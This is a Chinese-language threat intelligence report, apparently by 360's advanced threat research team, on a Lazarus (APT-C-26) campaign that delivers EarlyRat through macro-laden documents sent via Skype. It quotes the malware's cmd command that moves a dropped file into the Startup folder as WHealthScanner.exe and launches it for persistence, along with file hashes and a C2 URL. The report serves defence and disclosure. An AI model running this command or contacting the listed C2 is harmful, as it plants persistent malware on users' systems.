APT-C-26(Lazarus)组织使用EarlyRat的攻击活动分析
一、攻击活动分析
1.攻击流程分析
在我们的观察中,疑似攻击者通过Skype发送诱饵文件下载链接,之后用户通过谷歌浏览器下载了含有恶意文档的压缩文件。一旦用户被诱导打开该文件,攻击者则利用伪装成Microsoft信息的技巧,诱使用户启用宏功能。一旦用户上钩,宏将被激活并释放EarlyRat,然后开始窃取用户信息和执行恶意命令。
2.载荷投递分析
/c ping -n 16 226.132.219.125&pushd&forfiles /P %tmp% /S /M 1Vqar5tGI51*.sak /C "cmd /c move /y @file \"%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\WHealthScanner.exe\"&ping -n 14 74.124.228.148&pushd&\"%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\WHealthScanner.exe\""
攻击者利用命令提示符对特定IP地址(226.132.219.125和74.124.228.148)执行ping操作,并在系统临时文件夹中寻找特定的恶意文件。找到后,文件将被移动并重命名为WHealthScanner.exe,存储在用户的启动文件夹中,以便在每次系统启动时都会运行。这种行为表明攻击者正试图获取持久的系统访问权限,并且该方法具有较高的隐蔽性。
3.攻击组件分析
图3 解密字符
二、归属研判
在2022年9月,网络安全公司Cisco揭露了一起严重的网络攻击事件:Lazarus组织在2022年2月至7月期间,运用包括MagicRAT在内的多个恶意组件,对全球范围内的能源供应商进行攻击。在这次攻击中,攻击者利用log4j漏洞作为入侵点,并部署了众多恶意组件。值得注意的是,Cisco在其报告中披露了一个IP地址(40.121.90[.]194),这一地址与我们在分析EarlyRat过程中所发现的C2地址完全一致。
三、防范排查建议
1. 聊天工具的安全使用:教育员工或用户,对通过聊天工具接收到的任何未经请求的文件或链接保持警惕,尤其是来自不熟悉的发送者或看起来可疑的文件。
2. 保持浏览器更新:始终确保您的浏览器是最新版本。浏览器的更新往往包含了最新的安全补丁,可以帮助阻止恶意软件的入侵。
3. 下载内容审查:始终谨慎对待所有下载内容,无论它们来自何处。只从可信的来源下载,并在打开任何下载文件之前都进行扫描。
4. 宏的使用:在打开任何包含宏的文档时,应始终保持警惕。最好的策略是默认禁用所有宏,并只在需要且来自可信来源的情况下手动启用。
5. 启动文件夹管理:在启动文件夹搜索WHealthScanner.exe,并使用360安全卫士进行扫描分析。
6. 定期更新和补丁管理:保持所有系统、应用程序和防病毒软件的最新版本,以确保您的网络对最新的安全威胁有所准备。
7. 开展网络安全意识培训:定期进行网络安全培训,使员工了解最新的网络威胁,包括如何识别和处理恶意软件、钓鱼攻击和其他网络安全问题。
8. 定期审计和监控:定期审计和监控网络活动,尤其是对内部和外部数据传输的监控,以便能及时发现不寻常的数据访问或传输行为。
9. 使用专业防病毒软件:使用知名的安全软件,如360安全卫士,可以帮助检测并阻止EarlyRat等恶意软件。8031958a3156187fa53490fb98c39afd
344a7f277f3d7dd2dc0e86f69c3ca49d
39598b710e44a5d27684dfa463ce5148
e439f850aa8ead560c99a8d93e472225
d642c62147fbdee00412c0604a25a58b
74f1b7a57cd76279ec16b311089995a6
78e7b9ab205ea31f7eef26de6293f103
http://40.121.90.194/help.php
360高级威胁研究院